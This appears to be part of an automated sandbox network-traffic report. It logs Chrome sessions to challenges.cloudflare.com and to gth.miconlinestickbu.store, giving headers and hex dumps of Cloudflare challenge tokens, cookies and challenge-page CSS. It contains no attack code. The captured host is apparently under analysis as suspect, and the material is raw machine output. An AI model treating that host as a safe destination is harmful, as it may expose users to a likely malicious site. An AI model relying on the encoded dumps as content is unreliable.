                                    2024-05-22 15:09:21 UTC1369INData Raw: 58 36 39 77 44 7a 34 75 66 46 78 2b 50 38 42 2b 2f 4d 37 65 63 41 34 75 66 75 7a 51 72 32 2b 39 63 4f 46 67 67 51 36 2b 77 41 33 42 6a 77 2f 68 62 65 41 50 51 73 42 2b 6a 71 35 51 34 68 4e 4f 30 49 45 77 41 67 43 78 63 76 42 51 77 71 4d 78 4d 69 43 7a 51 50 46 54 38 56 52 44 70 43 2f 43 4e 43 52 43 4e 41 53 7a 6f 52 4b 69 42 4d 4a 56 51 30 46 42 67 6e 4b 42 34 5a 57 78 74 59 4e 31 52 66 54 79 55 2f 58 69 51 6e 51 31 70 67 4b 57 73 72 61 43 39 7a 53 6a 55 32 4d 79 39 78 4c 54 52 4e 58 45 74 4f 51 46 4e 35 64 46 56 36 57 48 68 2f 68 46 74 63 62 45 56 73 69 57 39 2b 64 47 6d 43 62 5a 52 67 59 59 78 73 66 57 2b 5a 58 4a 74 71 6f 6d 39 69 65 33 6d 42 64 70 52 6d 61 71 6d 5a 65 70 36 4b 6e 4b 71 54 6b 6f 6d 30 68 59 69 42 6c 4a 4f 59 75 6e 69 51 6d 58 32 65 69
                                    Data Ascii: X69wDz4ufFx+P8B+/M7ecA4ufuzQr2+9cOFggQ6+wA3Bjw/hbeAPQsB+jq5Q4hNO0IEwAgCxcvBQwqMxMiCzQPFT8VRDpC/CNCRCNASzoRKiBMJVQ0FBgnKB4ZWxtYN1RfTyU/XiQnQ1pgKWsraC9zSjU2My9xLTRNXEtOQFN5dFV6WHh/hFtcbEVsiW9+dGmCbZRgYYxsfW+ZXJtqom9ie3mBdpRmaqmZep6KnKqTkom0hYiBlJOYuniQmX2ei
                                    2024-05-22 15:09:21 UTC1369INData Raw: 2b 33 64 33 57 42 39 72 36 79 75 63 51 41 67 37 73 43 66 54 52 31 2b 59 50 32 4e 76 71 47 39 76 66 46 51 34 67 34 2f 30 54 35 51 45 64 4a 79 38 47 2b 68 2f 74 37 79 55 6e 37 41 30 44 4e 2f 67 51 4b 42 6e 34 46 68 59 67 50 42 6b 66 4c 2f 34 63 2b 53 55 45 49 50 30 2f 42 51 73 72 4d 51 77 51 55 44 38 55 45 31 6c 58 46 78 68 49 55 78 55 62 54 45 73 65 4f 69 39 6a 48 45 4e 41 52 6d 59 39 50 31 56 63 61 30 52 42 59 57 56 4e 61 30 63 78 64 58 59 31 53 48 63 33 4d 44 39 38 59 56 4e 4d 64 6b 35 77 58 31 56 65 5a 57 68 36 64 31 39 73 58 57 5a 7a 63 57 78 79 64 6e 57 4c 62 57 78 34 56 4a 75 4c 63 34 78 2f 65 48 31 35 6b 6d 35 6c 6f 36 52 67 58 57 68 6f 72 6e 71 6c 66 48 75 69 6a 70 4f 4a 75 4b 6d 43 73 33 75 70 74 58 32 64 65 70 78 2b 64 63 42 2f 77 59 58 46 74 4b
                                    Data Ascii: +3d3WB9r6yucQAg7sCfTR1+YP2NvqG9vfFQ4g4/0T5QEdJy8G+h/t7yUn7A0DN/gQKBn4FhYgPBkfL/4c+SUEIP0/BQsrMQwQUD8UE1lXFxhIUxUbTEseOi9jHENARmY9P1Vca0RBYWVNa0cxdXY1SHc3MD98YVNMdk5wX1VeZWh6d19sXWZzcWxydnWLbWx4VJuLc4x/eH15km5lo6RgXWhornqlfHuijpOJuKmCs3uptX2depx+dcB/wYXFtK
                                    2024-05-22 15:09:21 UTC92INData Raw: 41 38 6e 52 43 65 4c 7a 38 4e 67 58 39 78 6e 35 2b 42 72 78 48 65 77 66 39 75 77 6c 46 78 41 63 34 67 49 58 36 4f 4d 45 43 52 37 6f 4d 77 49 31 49 51 55 70 47 43 72 7a 43 7a 59 52 2b 2f 63 56 43 6a 67 43 45 77 4e 41 2f 6b 67 4b 47 67 55 64 52 53 45 43 51 42 70 47 49 56 4d 2b
                                    Data Ascii: A8nRCeLz8NgX9xn5+BrxHewf9uwlFxAc4gIX6OMECR7oMwI1IQUpGCrzCzYR+/cVCjgCEwNA/kgKGgUdRSECQBpGIVM+


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    27192.168.2.449794104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:21 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1564193166:1716387281:lZ0loq2aY3ZcNtXwgsQeLDV2LUjFlVl_FzsscFgqUA0/887db996294478e1/e2c69a9cf6a5b67 HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: */*
                                    Sec-Fetch-Site: none
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: empty
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:21 UTC375INHTTP/1.1 404 Not Found
                                    Date: Wed, 22 May 2024 15:09:21 GMT
                                    Content-Type: application/json
                                    Content-Length: 7
                                    Connection: close
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    cf-chl-out: 4N/RKs4bS7wOS1lhihDNLA==$IeKueMfJ5cyZ0qJNrMlr1w==
                                    Server: cloudflare
                                    CF-RAY: 887dba11bc3e1784-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                    Data Ascii: invalid


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    28192.168.2.449795104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:21 UTC1216OUTPOST / HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    Content-Length: 4966
                                    Cache-Control: max-age=0
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    Upgrade-Insecure-Requests: 1
                                    Origin: https://gth.miconlinestickbu.store
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-User: ?1
                                    Sec-Fetch-Dest: document
                                    Referer: https://gth.miconlinestickbu.store/?__cf_chl_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:21 UTC4966OUTData Raw: 31 38 30 64 30 64 62 32 36 61 33 31 61 38 35 63 36 65 39 34 31 63 64 31 66 36 31 62 32 66 37 63 62 30 63 32 33 65 62 38 66 36 35 66 38 62 64 31 65 62 34 35 36 61 36 33 64 31 32 32 63 33 31 63 3d 31 69 69 65 66 71 34 4b 49 4d 71 58 2e 6f 56 75 50 38 79 4d 57 32 73 33 6d 58 57 53 6c 2e 4e 30 34 53 61 77 74 45 36 75 4d 62 45 2d 31 37 31 36 33 39 30 35 33 38 2d 31 2e 31 2e 31 2e 31 2d 45 50 51 37 51 47 56 30 79 4d 6c 46 66 6a 72 6d 73 51 50 77 6e 72 6f 54 6a 54 44 58 54 78 57 79 36 73 63 5a 66 36 37 33 49 74 45 42 67 47 4d 5f 69 4d 54 39 6b 49 4a 55 73 68 73 31 6d 56 50 78 31 63 61 59 38 4e 53 42 77 70 65 6e 72 4a 5f 35 6d 57 4e 5a 30 57 59 45 49 33 30 6a 54 35 4f 38 57 68 74 6e 37 48 46 30 2e 62 31 61 76 43 41 6b 4e 65 64 64 39 68 61 6f 6f 6a 57 77 6a 55 63
                                    Data Ascii: 180d0db26a31a85c6e941cd1f61b2f7cb0c23eb8f65f8bd1eb456a63d122c31c=1iiefq4KIMqX.oVuP8yMW2s3mXWSl.N04SawtE6uMbE-1716390538-1.1.1.1-EPQ7QGV0yMlFfjrmsQPwnroTjTDXTxWy6scZf673ItEBgGM_iMT9kIJUshs1mVPx1caY8NSBwpenrJ_5mWNZ0WYEI30jT5O8Whtn7HF0.b1avCAkNedd9haoojWwjUc
                                    2024-05-22 15:09:22 UTC1181INHTTP/1.1 302 Found
                                    Date: Wed, 22 May 2024 15:09:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: cf_clearance=1T3jP4zcM.nm3vaN62KsCJ1oWLjYSmxnj8rkYXhkm0E-1716390538-1.0.1.1-Iw.lyUt5.YczPJHNyKtmQ9_Nf35oRLReP.QZn35uRlB2DnMwMJhjioFbak4ZzU7c51agIePjafNSrdiqZFqUDg; Path=/; Expires=Thu, 22-May-25 15:09:22 GMT; Domain=.miconlinestickbu.store; HttpOnly; Secure; SameSite=None; Partitioned
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    Set-Cookie: PHPSESSID=40526b412e3f7a3670e1fffe72385dfd; path=/
                                    Location: ./6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f75fLOG6fc27ea7f3db2fd9787a0f6b674d5bc4664e0aa26f760
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BHbs1sJrd7AYHNFB65P6kTOefGpLVx%2FIh%2Bc5WTSL5Lb0WAq2ayUUwmir4lV95KPkIGDdnJIM8k2s2oLnI2gMVvuIo%2BaJuH9%2Fvmi4rkMe7PYwWPJJNNnOJLa9Ic1qLTqsvEYhl9CA5jXCrWSw%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887dba14cb8e0caa-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    29192.168.2.449796104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:22 UTC960OUTGET /favicon.ico HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: image
                                    Referer: https://gth.miconlinestickbu.store/?__cf_chl_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:22 UTC1280INHTTP/1.1 403 Forbidden
                                    Date: Wed, 22 May 2024 15:09:22 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 16602
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-05-22 15:09:22 UTC761INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6c 45 38 59 7a 48 42 66 73 2f 65 74 44 36 74 46 33 32 76 38 41 6a 39 53 31 72 5a 32 6a 43 30 78 54 4b 78 2b 41 31 75 39 66 36 41 64 49 76 70 2b 62 36 31 67 65 6c 64 38 2f 4d 6e 49 5a 57 31 48 55 6b 77 74 6b 72 47 4a 58 4d 6f 77 51 72 4b 6e 45 71 4f 4b 2b 37 4a 65 4a 38 49 44 65 54 76 4f 30 36 74 6c 6a 71 57 63 68 33 78 64 56 73 6e 32 33 64 55 77 56 4d 52 67 39 2f 6b 4a 33 52 4a 65 73 72 31 43 34 70 4a 44 67 4e 63 4b 6f 54 42 62 41 49 4c 77 30 41 3d 3d 24 64 2f 4f 63 62 54 72 4a 51 51 56 42 66 35 71 76 41 32 74 52 55 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61
                                    Data Ascii: cf-chl-out: lE8YzHBfs/etD6tF32v8Aj9S1rZ2jC0xTKx+A1u9f6AdIvp+b61geld8/MnIZW1HUkwtkrGJXMowQrKnEqOK+7JeJ8IDeTvO06tljqWch3xdVsn23dUwVMRg9/kJ3RJesr1C4pJDgNcKoTBbAILw0A==$d/OcbTrJQQVBf5qvA2tRUw==Cache-Control: private, max-age=0, no-store, no-cache, must-reva
                                    2024-05-22 15:09:22 UTC697INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70
                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name="viewp
                                    2024-05-22 15:09:22 UTC1369INData Raw: 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 39 39 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 7d 62 6f 64 79 20 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 62 6f 64 79 20 2e 70 6f 77 2d 62 75 74 74 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 36 39 33 66 66 3b 63 6f 6c 6f 72 3a 23 31 64 31 64 31 64 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75
                                    Data Ascii: lor:#fff}body a:hover{color:#ee730a;text-decoration:underline}body .lds-ring div{border-color:#999 transparent transparent}body .font-red{color:#b20f03}body .pow-button{background-color:#4693ff;color:#1d1d1d}body #challenge-success-text{background-image:u
                                    2024-05-22 15:09:22 UTC1369INData Raw: 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 62 6f 64 79 2e 6e 6f 2d 6a 73 20 2e 63 68 61 6c 6c 65 6e 67 65 2d 72 75 6e 6e 69 6e 67 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 32 32 3b 63 6f 6c 6f 72 3a 23 64 39 64 39 64 39 7d 62 6f 64 79 2e 64 61 72 6b 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 62 6f 64 79 2e 64 61 72 6b 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 23 65 65 37 33 30 61 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 62 6f 64 79 2e 64 61 72 6b 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b
                                    Data Ascii: n-height:100vh}body.no-js .loading-spinner{visibility:hidden}body.no-js .challenge-running{display:none}body.dark{background-color:#222;color:#d9d9d9}body.dark a{color:#fff}body.dark a:hover{color:#ee730a;text-decoration:underline}body.dark .lds-ring div{
                                    2024-05-22 15:09:22 UTC1369INData Raw: 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 62 6f 64 79 2e 6c 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 7b 63 6f 6c 6f 72 3a 23 30 30 35 31 63 33 7d 62 6f 64 79 2e 6c 69 67 68 74 20 61 3a 68 6f 76 65 72 7b 63 6f 6c 6f
                                    Data Ascii: 1OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}body.light{background-color:transparent;color:#313131}body.light a{color:#0051c3}body.light a:hover{colo
                                    2024-05-22 15:09:22 UTC1369INData Raw: 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                    Data Ascii: C41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+)}a{background-color
                                    2024-05-22 15:09:22 UTC1369INData Raw: 54 4d 75 4d 44 45 31 49 44 45 7a 4c 6a 41 78 4e 53 41 77 49 44 41 67 4d 43 41 78 4e 69 41 7a 62 54 41 67 4d 6a 52 68 4d 54 45 67 4d 54 45 67 4d 43 41 78 49 44 45 67 4d 54 45 74 4d 54 45 67 4d 54 45 75 4d 44 45 67 4d 54 45 75 4d 44 45 67 4d 43 41 77 49 44 45 74 4d 54 45 67 4d 54 45 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 6d 4d 31 4e 7a 52 68 49 69 42 6b 50 53 4a 4e 4d 54 63 75 4d 44 4d 34 49 44 45 34 4c 6a 59 78 4e 55 67 78 4e 43 34 34 4e 30 77 78 4e 43 34 31 4e 6a 4d 67 4f 53 34 31 61 44 49 75 4e 7a 67 7a 65 6d 30 74 4d 53 34 77 4f 44 51 67 4d 53 34 30 4d 6a 64 78 4c 6a 59 32 49 44 41 67 4d 53 34 77 4e 54 63 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77
                                    Data Ascii: TMuMDE1IDEzLjAxNSAwIDAgMCAxNiAzbTAgMjRhMTEgMTEgMCAxIDEgMTEtMTEgMTEuMDEgMTEuMDEgMCAwIDEtMTEgMTEiLz48cGF0aCBmaWxsPSIjZmM1NzRhIiBkPSJNMTcuMDM4IDE4LjYxNUgxNC44N0wxNC41NjMgOS41aDIuNzgzem0tMS4wODQgMS40MjdxLjY2IDAgMS4wNTcuMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQw
                                    2024-05-22 15:09:22 UTC1369INData Raw: 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 30 30 33 36 38 31 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 66 6f 6f 74 65 72 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 66 6f 6f 74 65 72 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 23 64 39 64 39 64 39 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 64 69 73 70 6c
                                    Data Ascii: rder-color:#003681;color:#fff;cursor:pointer}.footer{font-size:.75rem;line-height:1.125rem;margin:0 auto;max-width:60rem;width:100%}.footer-inner{border-top:1px solid #d9d9d9;padding-bottom:1rem;padding-top:1rem}.clearfix:after{clear:both;content:"";displ
                                    2024-05-22 15:09:22 UTC1369INData Raw: 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 61 63 74 69 76 65 29 2c 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 6d 73 2d 68 69 67 68 2d 63 6f 6e 74 72 61 73 74 3a 6e 6f 6e 65 29 7b 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 7d 2e 72 74 6c 20 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 73 75 63 63 65 73 73 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 34 32 70 78 7d 2e 72
                                    Data Ascii: a screen and (-ms-high-contrast:active),screen and (-ms-high-contrast:none){.main-wrapper,body{display:block}}.rtl .heading-favicon{margin-left:.5rem;margin-right:0}.rtl #challenge-success-text{background-position:100%;padding-left:0;padding-right:42px}.r
                                    2024-05-22 15:09:22 UTC1369INData Raw: 6c 36 30 4b 6a 36 5a 67 5a 77 64 4f 32 72 61 48 45 6a 47 6c 59 70 34 2e 30 64 41 36 6b 53 58 39 6d 69 6c 47 4f 51 36 38 30 43 46 4a 78 45 33 64 53 30 39 72 68 75 57 56 45 43 64 47 67 70 4b 61 68 7a 4e 62 36 52 48 6b 72 41 67 4d 5f 30 4e 63 75 49 53 30 4e 30 52 47 67 5a 42 48 7a 36 30 6e 65 51 6d 72 6d 75 75 6b 46 5a 53 53 78 42 39 6b 6b 35 4d 45 46 2e 67 30 2e 6b 78 65 66 76 72 43 4b 47 69 6d 69 2e 35 53 45 4f 36 46 48 42 30 62 48 58 69 33 77 45 5a 59 46 4e 6b 72 6a 79 45 77 70 52 6b 51 77 49 62 70 4f 7a 49 6e 55 4f 39 48 54 62 30 4d 48 2e 5a 74 73 2e 6e 53 37 5a 78 77 33 58 74 31 56 6c 78 35 55 41 7a 41 70 35 32 61 54 67 41 6f 4d 4e 71 7a 4e 30 5a 64 77 4b 69 4b 30 57 5a 4c 53 47 35 57 58 31 4f 45 43 45 59 76 54 54 5f 4d 55 41 79 74 4a 33 5a 32 53 4b 78
